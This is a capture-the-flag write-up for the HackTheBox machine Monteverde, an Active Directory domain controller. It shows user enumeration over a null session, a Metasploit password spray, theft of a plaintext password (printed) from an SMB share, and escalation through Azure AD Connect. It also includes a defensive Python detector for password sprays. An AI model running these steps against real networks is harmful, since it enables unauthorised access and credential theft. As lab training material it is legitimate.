HackTheBox — Monteverde

Summary

Today we have a Windows machine that provides Active Directory services, with IP 10.10.10.172.

Let’s get started!

Enumeration

Nmap

root@strike:~# nmap -sC -sV 10.10.10.172
Starting Nmap 7.70 ( https://nmap.org ) at 2020-06-18 00:51 EET
Nmap scan report for 10.10.10.172
Host is up (0.13s latency).
Not shown: 989 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-06-17 22:07:34Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.70%I=7%D=6/18%Time=5EEA9EAC%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -44m49s, deviation: 0s, median: -44m49s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-06-18 00:09:53
|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 297.02 seconds
root@strike:~#

We found several open ports that point to a domain controller: 88 (Kerberos), 135 (RPC), 139/445 (NetBIOS/SMB), 389/3268 (LDAP) and more.

Let’s enumerate the domain users over MSRPC with a null session:

root@strike:~# rpcclient -U "" -N 10.10.10.172
Unknown parameter encountered: "winbind trusted domains only"
Ignoring unknown parameter "winbind trusted domains only"
rpcclient $> enumdomusers
user:[Guest] rid:[0x1f5]
user:[AAD_987d7f2f57d2] rid:[0x450]
user:[mhope] rid:[0x641]
user:[SABatchJobs] rid:[0xa2a]
user:[svc-ata] rid:[0xa2b]
user:[svc-bexec] rid:[0xa2c]
user:[svc-netapp] rid:[0xa2d]
user:[dgalanos] rid:[0xa35]
user:[roleary] rid:[0xa36]
user:[smorgan] rid:[0xa37]
rpcclient $>

I dumped all the users into a users.txt file.

Exploitation

Let’s run the smb_login module in Metasploit with USER_AS_PASS, to find an account whose password is the same as its username:

msf5 > use auxiliary/scanner/smb/smb_login
msf5 auxiliary(scanner/smb/smb_login) > set SMBDomain MEGABANK.LOCAL
SMBDomain => MEGABANK.LOCAL
msf5 auxiliary(scanner/smb/smb_login) > set USER_FILE /root/Desktop/users.txt
USER_FILE => /root/Desktop/users.txt
msf5 auxiliary(scanner/smb/smb_login) > set USER_AS_PASS true
USER_AS_PASS => true
msf5 auxiliary(scanner/smb/smb_login) > set rhosts 10.10.10.172
rhosts => 10.10.10.172
msf5 auxiliary(scanner/smb/smb_login) > exploit

[*] 10.10.10.172:445 - 10.10.10.172:445 - Starting SMB login bruteforce
[-] 10.10.10.172:445 - 10.10.10.172:445 - Failed: 'MEGABANK.LOCAL\Guest:Guest',
[!] 10.10.10.172:445 - No active DB -- Credential data will not be saved!
[-] 10.10.10.172:445 - 10.10.10.172:445 - Failed: 'MEGABANK.LOCAL\AAD_987d7f2f57d2:AAD_987d7f2f57d2',
[-] 10.10.10.172:445 - 10.10.10.172:445 - Failed: 'MEGABANK.LOCAL\mhope:mhope',
[-] 10.10.10.172:445 - 10.10.10.172:445 - Failed: 'MEGABANK.LOCAL\dgalanos:dgalanos',
[-] 10.10.10.172:445 - 10.10.10.172:445 - Failed: 'MEGABANK.LOCAL\roleary:roleary',
[-] 10.10.10.172:445 - 10.10.10.172:445 - Failed: 'MEGABANK.LOCAL\smorgan:smorgan',
[+] 10.10.10.172:445 - 10.10.10.172:445 - Success: 'MEGABANK.LOCAL\SABatchJobs:SABatchJobs'
[*] 10.10.10.172:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/smb_login) >
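
Seen from the defender's side, the run above shows up in the domain controller's Security log as a burst of 4625 (failed logon) events for many different accounts from one source in a few seconds, followed by a 4624 (successful logon) for the one that matched. The following is an added example, not part of the write-up: a small Python detector for that pattern, run over constructed sample events (the source addresses and timestamps are made up).

```python
"""Detect a password spray like the smb_login run above from Windows
Security log events. Constructed sample events, not real Monteverde logs."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed events: (timestamp, event_id, source_ip, account)
# 4625 = failed logon, 4624 = successful logon.
SAMPLE_EVENTS = [
    ("2020-06-18 00:12:01", 4625, "10.10.14.5", "Guest"),
    ("2020-06-18 00:12:01", 4625, "10.10.14.5", "AAD_987d7f2f57d2"),
    ("2020-06-18 00:12:02", 4625, "10.10.14.5", "mhope"),
    ("2020-06-18 00:12:02", 4625, "10.10.14.5", "dgalanos"),
    ("2020-06-18 00:12:03", 4625, "10.10.14.5", "roleary"),
    ("2020-06-18 00:12:03", 4625, "10.10.14.5", "smorgan"),
    ("2020-06-18 00:12:04", 4624, "10.10.14.5", "SABatchJobs"),
    # Benign: one user mistyping a password twice from a workstation.
    ("2020-06-18 00:30:00", 4625, "10.10.10.50", "mhope"),
    ("2020-06-18 00:30:09", 4625, "10.10.10.50", "mhope"),
    ("2020-06-18 00:30:20", 4624, "10.10.10.50", "mhope"),
]

def detect_spray(events, min_accounts=5, window=timedelta(minutes=5)):
    """Return {source_ip: (distinct failed accounts, accounts that later
    succeeded)} for sources whose 4625s hit >= min_accounts distinct
    accounts inside `window`. A brute force against a single account has
    many failures but one account, so it does not trigger this rule."""
    fails = defaultdict(list)     # src -> [(time, account)]
    successes = defaultdict(set)  # src -> {account}
    for ts, eid, src, acct in events:
        t = datetime.strptime(ts, "%Y-%m-%d %H:%M:%S")
        if eid == 4625:
            fails[src].append((t, acct))
        elif eid == 4624:
            successes[src].add(acct)
    alerts = {}
    for src, attempts in fails.items():
        attempts.sort()
        for i, (t0, _) in enumerate(attempts):
            in_window = {a for t, a in attempts[i:] if t - t0 <= window}
            if len(in_window) >= min_accounts:
                alerts[src] = (sorted(in_window), sorted(successes[src]))
                break
    return alerts

if __name__ == "__main__":
    for src, (tried, hit) in detect_spray(SAMPLE_EVENTS).items():
        print(f"spray from {src}: {len(tried)} accounts, success as {hit}")
```

The same logic maps directly onto a SIEM rule: group 4625 by source address, count distinct target accounts per window, and join against 4624 from the same source to surface the account that was actually compromised.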

The SABatchJobs account uses its username as its password. Let’s use it to access the users$ share:

root@strike:~# smbclient -U 'SABatchJobs' //10.10.10.172/users$
WARNING: The "encrypt passwords" option is deprecated
Unknown parameter encountered: "winbind trusted domains only"
Ignoring unknown parameter "winbind trusted domains only"
WARNING: The "null passwords" option is deprecated
Enter WORKGROUP\SABatchJobs's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Jan 3 15:12:48 2020
.. D 0 Fri Jan 3 15:12:48 2020
dgalanos D 0 Fri Jan 3 15:12:30 2020
mhope D 0 Fri Jan 3 15:41:18 2020
roleary D 0 Fri Jan 3 15:10:30 2020
smorgan D 0 Fri Jan 3 15:10:24 2020

524031 blocks of size 4096. 519955 blocks available
smb: \> cd mhope
smb: \mhope\> ls
. D 0 Fri Jan 3 15:41:18 2020
.. D 0 Fri Jan 3 15:41:18 2020
azure.xml AR 1212 Fri Jan 3 15:40:23 2020

524031 blocks of size 4096. 519955 blocks available
smb: \mhope\> get azure.xml
getting file \mhope\azure.xml of size 1212 as azure.xml (3.3 KiloBytes/sec) (average 3.3 KiloBytes/sec)
smb: \mhope\>

I found an interesting file, so I downloaded it and took a look.

Now I have credentials to get a shell as this user: username mhope and password 4n0therD4y@n0th3r$

Gain user flag!

Privilege Escalation

The current user is a member of the MEGABANK\Azure Admins group:

*Evil-WinRM* PS C:\Users\mhope\Desktop> net users mhope
User name mhope
Full Name Mike Hope
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set 1/2/2020 4:40:05 PM
Password expires Never
Password changeable 1/3/2020 4:40:05 PM
Password required Yes
User may change password No

Workstations allowed All
Logon script
User profile
Home directory \\monteverde\users$\mhope
Last logon 6/17/2020 3:58:24 PM

Logon hours allowed All

Local Group Memberships *Remote Management Use
Global Group memberships *Azure Admins *Domain Users
The command completed successfully.

*Evil-WinRM* PS C:\Users\mhope\Desktop>

Azure AD Connect is the Microsoft tool that synchronises on-premises Active Directory with Azure AD for hybrid identity, so the Azure Admins group is the relevant privilege here.

Ref: Azure-ADConnect.ps1

Now we need to upload the Azure-ADConnect.ps1 file to the machine.
Launch a simple Python HTTP server on the attacking host.

Now upload the script.

Now let’s try to connect with administrator credentials

Gain root flag!

If you learned anything useful from this write-up, respect me on HackTheBox.

Thanks for your time!

Ahmed Samir

CTFer | Computer Science Student